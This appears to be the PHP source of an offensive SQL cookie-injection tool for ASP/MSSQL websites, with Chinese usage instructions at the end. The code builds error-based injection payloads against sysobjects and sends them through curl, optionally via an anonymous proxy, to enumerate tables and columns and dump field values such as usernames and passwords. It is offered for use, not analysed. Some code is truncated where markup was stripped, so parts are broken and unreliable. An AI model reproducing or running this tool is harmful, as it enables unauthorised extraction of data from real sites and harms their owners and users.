Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]

:::Attack Parameters:::
\n"; echo "Target Url:$url
\n"; echo "Target Cookie:\"$cookie\"
\n"; echo "Referer Url:$referer
\n"; echo "Injection Type:"; switch($bstr){ case 'num': echo "number
\n"; $bstr=0;//数字型 break; case 'char': echo "character
\n"; $bstr=1;//字符型 break; } echo "Via Proxy:".((isset($useproxy) && !empty($proxy))? 'Yes':'No')."
\n"; if(isset($useproxy) && !empty($proxy)) echo "Proxy Address:$proxy
\n"; echo "Injection Action:"; switch($action){ case 'exp_tabs': echo "Explode Table Names
\n\n"; exploit_tab(); break; case 'exp_fields': echo "Explode Table Fields
\n"; if(empty($t_name)) die("Error:table name must be specified!
"); $table_name=$t_name; echo "Table Name:$table_name
\n\n"; exploit_field(); break; case 'exp_values': echo "Explode Table Values
\n"; if(empty($tab_name)) die("Error:table name must be specified!
"); elseif(empty($field_name)) die("Error:field name must be specified!
"); $table_name=$tab_name; echo "Table Name:$table_name
\n"; echo "Fields Name:".str_replace(","," ",$field_name)."
\n\n"; explode_value(); break; } } // exploit_tab(); // exploit_field(); // explode_value(); /////////////////////////////////////////////////////////////////////////////////////// function output_start() { echo "

\n"; echo "

\n"; echo "\n"; flush(); } function output_th($th) { switch($th){ case 'tr': echo ""; break; case '/tr': echo "\n"; break; default: echo "\n"; break; } flush(); } function output_td($td) { switch($td){ case 'tr': echo ""; break; case '/tr': echo "\n"; break; default: echo "\n"; break; } flush(); } function output_end() { echo "

$th
$td

\n"; flush(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //暴取字段值函数 function explode_value() { global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl; $i=1; $count=0; $fields=explode(",",$field_name); $sql_str=" And (Select Top 1 nchar(124)"; $sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))'; foreach($fields as $field){ $new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str); $sql_str.=$new_sub_str."+char(92)"; } $sql_str=substr($sql_str,0,strlen($sql_str)-9); $sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by "; $sub_str="MIKA_FIELD desc"; foreach($fields as $field){ $sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str); } $sql_str.=implode(",",$sub_strs).")>0--"; //echo $sql_str."\n"; $sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str); $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp); init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie); else $new_cookie=str_replace('MIKA',$old,$cookie); output_start(); $re=find_value($new_cookie); if($re) { $count=$re; echo "the number of record in $table_name: $count\n"; } output_th('tr'); foreach ($fields as $field){ output_th($field); } output_th('/tr'); do{ $new_sql_str=str_replace('MIKA_NUM',$i,$sql_str); //echo $sql_str."\n"; if($bstr) $new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie); else $new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie); $re=find_value($new_cookie); output_td('tr'); if($re) { $res=explode("\\",$re); foreach($res as $ree){ output_td($ree); } } output_td('/tr'); $i++; }while($i<=$count); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //另一种方式暴取表名的函数 function explode_tab(){ global $bstr,$curl,$cookie; $num=1; $i=0; $old_re=""; $re=""; $words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--"; init_session(); output_th('tr'); for($i=0;$i<8;$i++) output_th('Tables'); output_th('/tr'); output_td('tr'); do{ $new_words=str_replace('MIKA_NUM',$num,$words); if($bstr) $new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie); else $new_cookie=str_replace('MIKA',urlencode($new_words),$cookie); $re=find_value($new_cookie); if($re!=$old_re) { output_td($re); if(($num % 8)==0) { output_td('/tr'); output_td('tr'); } } else break; $old_re=$re; $num++; }while($re); output_td('/tr'); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //初始化会话函数 function init_session(){ global $proxy,$curl,$referer,$url; $curl=curl_init(); curl_setopt($curl,CURLOPT_HEADER,0); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_REFERER,$referer); curl_setopt($curl,CURLOPT_URL,$url); if(isset($useproxy) && !empty($proxy)) curl_setopt($curl,CURLOPT_PROXY,"$proxy"); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //通用取值函数 function find_value($cookie){ global $curl; //echo $cookie."\n"; curl_setopt($curl,CURLOPT_COOKIE,$cookie); $content=curl_exec($curl); //echo $content; $re=preg_match("/(\|.+\|)/i",$content,$result); if($re) { return str_replace('|','',$result[1]); } return 0; } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //字符串转换为msssql的16进制数值 function str2sqlhex($str){ $temp="0x"; for($i=0;$iNumber of tables:$re\n"; } /*do{ if($table==Null){ $new_url=str_replace('MFM_TABLES',"''",$tab_exp); } else{ $new_url=str_replace('MFM_TABLES',$temp,$tab_exp); } if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); $re=find_value($new_cookie); if($re) { $table=$re; if($temp==Null){ //$temp="'".$table."'"; $temp=str2sqlhex($table); }else{ //$temp.=","."'".$table."'"; $temp.=",".str2sqlhex($table); } fputs($table_file,"|------------+".$table."\n"); echo "|------------+".$table."\n"; } }while($re);*/ explode_tab(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //暴取字段函数 function exploit_field(){ global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl; $old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp); $count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column); $num=1; $i=0; init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_column,$cookie); else $new_cookie=str_replace('MIKA',$count_column,$cookie); output_start(); if($re=find_value($new_cookie)){ echo "Number of columns in $table_name:$re\n"; } output_th('tr'); for($i=0;$i<4;$i++) output_th('Fields'); output_th('/tr'); output_td('tr'); do{ $temp=$old_url; $new_url=str_replace('MFM_NUM',"$num",$temp); if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); //echo $new_url."\n"; $re=find_value($new_cookie); if($re){ output_td($re); if(($num % 4)==0) { output_td('/tr'); output_td('tr'); } } $num++; }while($re); output_td('/tr'); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //老方式暴取字段值的函数 function exploit_value(){ global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl; $value=Null; $temp=Null; $count_num=1; $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp); init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie); else $new_cookie=str_replace('MIKA',$old,$cookie); $re=find_value($new_cookie); $record_file=fopen("records-$field_name.txt","w"); if($re) { $count=$re; echo "the number of record in $table_name is: $count\n"; fputs($record_file,"the number of record in $table_name is: $count\n"); } $old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp); $old=str_replace('MFM_TABLE_NAME',$table_name,$old); //echo $old."\n"; do{ if($value==Null){ $new_url=str_replace('MFM_VALUE',"''",$old); } else{ $new_url=str_replace('MFM_VALUE',$temp,$old); } if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); $re=find_value($new_cookie); if($re) { $value=$re; echo "|------------+ ".$value."\n"; fputs($record_file,"|------------+ ".$value."\n"); if($temp==Null){ //$temp="'".urlencode($value)."'"; //$temp=urlencode("'".urlencode($value)."'"); $temp=str2sqlhex($value); //echo $temp."\n"; }else{ //$temp.=","."'".urlencode($value)."'"; //$temp.=",".urlencode("'".urlencode($value)."'"); $temp.=",".str2sqlhex($value); } }else{echo "|------------+ None\n"; fputs($record_file,"|------------+ None\n");} $count_num++; }while($count_num<=$count); fclose($record_file); } /////////////////////////////////////////////////////////////////////////////////////// ?>

cookie注入辅助工具 by mika[EST]

只针对mssql数据库，且错误提示开启。
用法非常简单：
首先将实际获得cookie填入"exploitable cookie"栏里。并将可注入的字段后面加上MIKA这个关键字，如下例所示，不要有空格。比如下面这个cookie：
"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"
其中myset这个字段没有过滤好，存在注入漏洞，那么你就需要在template后面加上MIKA这个关键字因此$cookie全局变量就成了如下这个样子：
$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";
"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容，一般情况下跟"Exploitable Url" 一样就可以了。
"Num Type"和"Char Type"是注入的类型，前者代表数值型，后者代表字符型，根据实际情况填写即可。
"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。
"Explode Fields Of" 爆取某个表的字段值，后面填上要暴取字段的表名.
"Explode Values Of" 暴取某个表的字段值。后面两个文本框，从左到又依次填写字段名和表名。其中字段数可以一次填写多个，以逗号(",")隔开，比如:
username,password,userid
"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理，代理地址格式为"127.0.0.1:8080".
by mika[EST]